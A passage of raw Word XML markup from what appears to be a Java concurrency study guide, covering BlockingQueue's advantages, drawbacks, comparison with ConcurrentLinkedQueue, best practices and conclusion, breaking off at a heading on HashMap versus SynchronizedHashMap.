          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manage submitted tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DD6B0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5673D093">
          <v:rect id="_x0000_i7110" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="245FE5AE"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8.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6686"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="3381ADE8" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DFAFA8A"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Advantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="706A27B1"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3ACDB47" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10F979D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4DC32D4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Internally handles synchronization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="4C3D6956" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29650E8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utomatic Blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24EA514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locks when the queue is empty (take) or full (put).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="2F4827A5" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AFEDFD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uilt-In Mechanisms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EDDD52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need to write custom producer-consumer synchronization code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="1CA4D755" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E25A7E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Fairness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05A817C7"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Some implementations (like ArrayBlockingQueue) support </w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>fairness policy</w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AE5878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3415797C">
          <v:rect id="_x0000_i7111" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="528D5A5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9.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036"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="0DE83311" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13CF0DFA"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isadvantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0957F1E9"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="598C80B3" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FFBC83A"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Memory Overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="193D23A0"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Some implementations like LinkedBlockingQueue consume more memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="3C3AFEA5" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E32291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erformance Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="656058C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locking behavior can slow down applications if not handled properly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="43AD7535" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E47E1C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Deadlock Possibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66AE317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Improper usage may lead to </w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>deadlocks</w:t>
            </w:r>
            <w:r w:rsidRPr="00E769E0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> if the producer keeps adding but consumers stop.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70764233"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36E25AF8">
          <v:rect id="_x0000_i7112" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D69777"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0. BlockingQueue vs ConcurrentLinkedQue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854"/>
        <w:gridCol w:w="3778"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="5CF027FA" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A7D6A4C"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1863DD0C"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BlockingQueue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A23DD5D"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oncurrentLinkedQueue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="1CE1A77D" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="043A90F1"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Blocking Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55D72F56"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 (put and take block when full/empty)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B3FE28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 blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="69C94F6E" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17E32F7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Thread Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01A0C5E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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FD4979E"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="141BEFC5" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AF91BCB"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71AC216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Producer-Consumer, Task Queues</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="738A1A32"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Non-blocking, real-time data transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="21DEF2C5" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ECA18E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Queue Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A2B3D6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Bounded or unbounded (depending on implementation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67E045B4"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Unbounded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E769E0" w:rsidRPr="00E769E0" w14:paraId="27E3A0FE" w14:textId="77777777" w:rsidTr="00E769E0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01142405"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When to Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CB68CFC"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hen blocking is needed for synchronization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="024B901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When non-blocking, fast access is required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62A3F38F"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24C8BC87">
          <v:rect id="_x0000_i7113" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C3AA23"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11. Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B62DDD9"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Choose the Right Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE5C590"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ArrayBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for fixed-size, high-throughput needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD92F8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LinkedBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for dynamically growing queues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3602395F"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PriorityBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>priority-based processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5FC2B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Avoid Deadlocks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABE7C3E"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w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offer()</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a timeout instead of </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>put()</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to avoid indefinite blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B1171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Handle InterruptedException:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD07D0A"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Always handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>InterruptedException</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when using blocking methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7559C9BD"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prefer Fair Queues When Needed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109D4116" w14:textId="77777777" w:rsidR="00E769E0" w:rsidRPr="00E769E0" w:rsidRDefault="00E769E0" w:rsidP="00E769E0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fairness policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if thread ordering is important (like in ArrayBlockingQueue).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD6B258" w14:textId="77777777" w:rsidR="00E769E0"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pict w14:anchorId="43F5581E">
          <v:rect id="_x0000_i7114" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7684D380" w14:textId="77777777" w:rsidR="00E769E0" w:rsidRPr="00E769E0" w:rsidRDefault="00E769E0" w:rsidP="00E769E0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286494A3" w14:textId="15D921BA" w:rsidR="00EE66E8" w:rsidRPr="00E769E0" w:rsidRDefault="00E769E0" w:rsidP="00E769E0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">BlockingQueue is an essential component for building </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrent applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer-consumer patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are common. Its built-in </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread safety</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> make it more robust and efficient compared to manual synchronization techniques. Choosing the right implementation based on the use case can significantly improve application performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A704E9" w14:textId="77777777" w:rsidR="00EE66E8" w:rsidRDefault="00EE66E8" w:rsidP="00EE66E8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F2440">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="24402302">
          <v:rect id="_x0000_i3932" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CDE391"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8" w:name="_Toc197867402"/>
      <w:r w:rsidRPr="004F2440">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between HashMap and SynchronizedHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="188"/>
    </w:p>
    <w:p w14:paraId="50A92A78" w14:textId="229DC5E3" w:rsidR="00D34DD9" w:rsidRPr="00D34DD9" w:rsidRDefault="00D34DD9" w:rsidP="000023F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
